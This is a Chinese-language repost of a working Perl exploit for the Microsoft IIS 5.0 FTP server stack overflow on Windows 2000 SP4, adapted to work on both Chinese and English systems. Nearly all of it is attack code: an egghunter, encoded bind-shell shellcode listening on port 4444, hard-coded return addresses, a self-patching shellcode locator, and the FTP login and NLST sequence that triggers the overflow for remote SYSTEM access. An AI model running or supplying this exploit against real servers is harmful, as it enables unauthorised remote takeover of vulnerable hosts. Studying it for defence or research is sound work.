Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版

摘要

作者:Inking。因为一些字符问题,英文版的 exp 没法直接用到中文操作系统上,花了些时间修改了 milw0rm 上的 exp,在自己的中、英文 Win2k SP4 虚拟机中测试都通过。

作者:Inking

因为一些字符问题,英文版的 exp 没法直接用到中文操作系统上,花了些时间修改了 milw0rm 上的 exp,在自己的中、英文 Win2k SP4 虚拟机中测试都通过。注意:本页转载的代码在排版时把所有反斜杠都替换成了正斜杠(例如 `/x89` 应为 `\x89`,`/r/n` 应为 `\r\n`,`s//./,/gi` 应为 `s/\./,/gi`),直接复制运行会发送 ASCII 文本而不是字节,使用前必须先还原这些转义。

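#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
#
# Modified by Inking so the same script works against both English and
# Chinese Win2k SP4 installs (see the per-line notes below).
#
# Usage: iiz5.pl <target> <your local ip>
#   <target>         IIS 5.0 FTP server (port 21) to attack
#   <your local ip>  address the target must connect back to for the FTP
#                    data channel (PORT command); must be reachable from
#                    the target
#
# NOTE(review): this is a weaponised exploit for an end-of-life platform.
# Only run it against systems you are explicitly authorised to test.
#
# NOTE(review): the copy of this script circulating on the web has every
# backslash turned into a forward slash ("/x89", "/r/n", "s//./,/gi").
# All escapes below have been restored ("\x89", "\r\n", "s/\./,/g");
# with the slashes Perl would send the literal text "/x89..." instead of
# bytes and length($sc) would be several times too large.

use strict;
use warnings;
use IO::Socket;

$| = 1;   # unbuffered STDOUT so server replies show up as they arrive

# Stage 1: egghunter (per the original comments above). Searches process
# memory for the egg tag and jumps to the payload that follows it.
my $sc =
    "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
  . "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
  . "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
  . "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
  . "\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f"
  . "\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46"
  . "\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34"
  . "\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a"
  . "\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";

# Stage 2: bind shell, prefixed with the egg tag "T00WT00W" that stage 1
# hunts for. Generated with:
#   ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
my $shell = "T00WT00W"
  . "\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4"
  . "\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86"
  . "\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01"
  . "\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c"
  . "\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb"
  . "\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85"
  . "\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e"
  . "\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a"
  . "\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5"
  . "\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee"
  . "\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3"
  . "\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85"
  . "\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8"
  . "\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a"
  . "\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80"
  . "\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84"
  . "\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d"
  . "\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60"
  . "\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca"
  . "\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3"
  . "\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19"
  . "\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed"
  . "\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f"
  . "\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4"
  . "\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";

print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";

if ($#ARGV != 1) {
    print "usage: iiz5.pl <target> <your local ip>\n";
    exit(0);
}

my $target = $ARGV[0];
my $locip  = $ARGV[1];

# The local IP is interpolated into the PORT command as "a,b,c,d", so
# insist on a dotted quad before rewriting the dots to commas.
die "local ip must be a dotted quad (a.b.c.d), got '$locip'\n"
    unless $locip =~ /\A\d{1,3}(?:\.\d{1,3}){3}\z/;
$locip =~ s/\./,/g;

# Random high port for the FTP data channel: the child listens on it and
# the parent tells the server to connect to it via PORT.
srand(time());
my $port = int(rand(31337 - 1022)) + 1025;

# Bind the data-channel listener BEFORE forking so the server can never
# receive the PORT command before anything is listening. (The original
# created the listener in the child, racing the parent's FTP session.)
my $servsock = IO::Socket::INET->new(
    LocalAddr => "0.0.0.0",
    LocalPort => $port,
    Proto     => 'tcp',
    Listen    => 1,
) or die "Could not create socket: $!\n";

my $pid = fork();
die "fork failed: $!\n" unless defined $pid;

if ($pid) {
    # Parent: drive the FTP control session. The listener belongs to the child.
    close($servsock);

    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => '21',
        Proto    => 'tcp',
    ) or die "Could not connect to $target:21: $!\n";

    # Two addresses taken from the target process. Adjust them to improve
    # portability; this pair worked on the author's test machines.
    my $patch   = "\x7e\xd1\xf9\x7f";
    my $retaddr = "\x9B\xB1\xF4\x77";
    # Alternative pair from wordexp (left commented out in the original):
    #   $patch   = "\x90\x80\xb7\x6f";
    #   $retaddr = "\xcd\x60\xb6\x6f";

    # Modified: the leading "KKK" was added. $myfindsc locates the payload
    # with "repne scasd [edi]", which compares 4 bytes at a time, so the
    # "SEXY" tag must be 4-byte aligned or it is never found.
    my $v = "KKKSEXY" . $sc . "V" x (500 - length($sc) - 5);

    # Stack layout at the time of the overflow (byte offsets):
    #     |0           |104     | 108   |112       |164     |168    |172     |176
    # Original (pre-modification) trigger string, kept for reference:
    #$c = "A" x 104 . $patch . $patch. "A" x 52 . $patch . "AAAA".
    #$retaddr .$patch."Aa4Aa5Aa6Aa7Aa8Aa9Ab";

    # Shellcode locator. C / inline-asm sketch from the original author.
    # The emitted bytes below are authoritative; the sketch's immediates do
    # not all match them exactly (e.g. the XOR displacement and the SUB
    # operand), so trust the bytes, not the listing.
    #
    #void myfindsc()
    #{
    #  __asm
    #  {
    #    int 3;
    #start:
    #    MOV EDX,ESP;
    #    FCMOVNBE ST,ST(2);
    #    _emit 0xd9; _emit 0x72; _emit 0xf4;   // FSTENV [edx-0Ch]
    #    POP EBP;
    #    PUSH EBP;
    #    POP EBX;
    #    PUSH 76h;
    #    POP EAX;
    #xorsc:
    #    XOR BYTE PTR DS:[EBX+28h],AL;         // patch the 0xff back into "decode"
    #findsc:
    #    MOV EAX,66666666h;
    #    SUB EAX,66566666h;
    #    PUSH EAX;
    #    POP EDI;
    #    PUSH 21212121h;
    #    POP ECX;
    #    MOV EAX,59584553h;                    // "SEXY"
    #    REPNE SCAS DWORD PTR ES:[EDI];
    #decode:
    #    _emit 0x89; _emit 0xE7;               // becomes JMP EDI once patched
    #  }
    #}
    #
    #void main()
    #{
    #  myfindsc();
    #}
    #
    # The locator must reach the shellcode with a call/jmp, and those
    # encodings contain 0xff, which IIS filters out of the request. The
    # locator is therefore written to patch its own 0xff back in at run
    # time (the XOR above). alpha2 encoding was considered but the result
    # was too long.
    my $myfindsc =
        "\x8b\xd4\xdb\xd2\xd9\x72\xf4\x5d\x55\x5b\x6a\x76\x58"
      . "\x30\x43\x27\xb8\x66\x66\x66\x66\x2d\x66\x66\x5F\x66"
      . "\x50\x5f\x68\x21\x21\x21\x21\x59\xb8\x53\x45\x58\x59"
      . "\xf2\xaf\x89\xe7";

    # Trigger string. Control flow after the overwritten return address:
    #   1st jump: the function returns via $retaddr onto "\xE2\xAA" near the
    #             end, but $myfindsc is too far for one short jump, so ...
    #   2nd jump: ... it hops to "\xEB\x8E", which finally reaches $myfindsc.
    my $c = $myfindsc
      . "A" x (104 - length($myfindsc))
      . $patch . $patch
      . "\xEB\x8E\x44\x44"        # <-- 2nd jump lands here, then on to $myfindsc
      . "A" x 48
      . $patch . "AAAA"
      . $retaddr . $patch
      . "A" x 16
      . "\xE2\xAA"                # <-- 1st jump: reached right after the return
      . "NN";

    # Send one FTP command line and echo the server's single-line reply.
    my $send = sub {
        my ($line) = @_;
        print $sock "$line\r\n";
        my $reply = <$sock>;
        print $reply if defined $reply;
    };

    my $banner = <$sock>;
    print $banner if defined $banner;

    # Two failed logins carrying stage 2 as the password. Presumably this
    # leaves the egg-tagged payload in process memory for the egghunter
    # to find (the original carries no comment here).
    $send->("USER anonimoos");
    $send->("PASS $shell");
    $send->("USER anonimoos");
    $send->("PASS $shell");

    # Real anonymous login.
    $send->("USER anonymous");
    $send->("PASS anonymous");
    $send->("MKD w00t$port");

    # We store shellcode in memory of process (stack): five copies of the
    # tagged stage-1 buffer.
    $send->("SITE $v") for 1 .. 5;

    $send->("CWD w00t$port");

    # Modified: one extra "C" added for 4-byte alignment.
    $send->("MKD CCCC$c");

    # Tell the server where the data-channel listener is.
    $send->("PORT $locip," . int($port / 256) . "," . int($port % 256));

    # TRIGGER
    $send->("NLST $c*/../C*/");
}
else {
    # Child: accept the data connection and relay whatever arrives.
    # NOTE(review): accept() blocks indefinitely if the exploit does not
    # fire; kill the process by hand in that case.
    my $new_sock = $servsock->accept()
        or die "accept failed: $!\n";
    while (<$new_sock>) {
        print $_;
    }
    close($servsock);
}
#Cheerio,
#
#Kingcope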
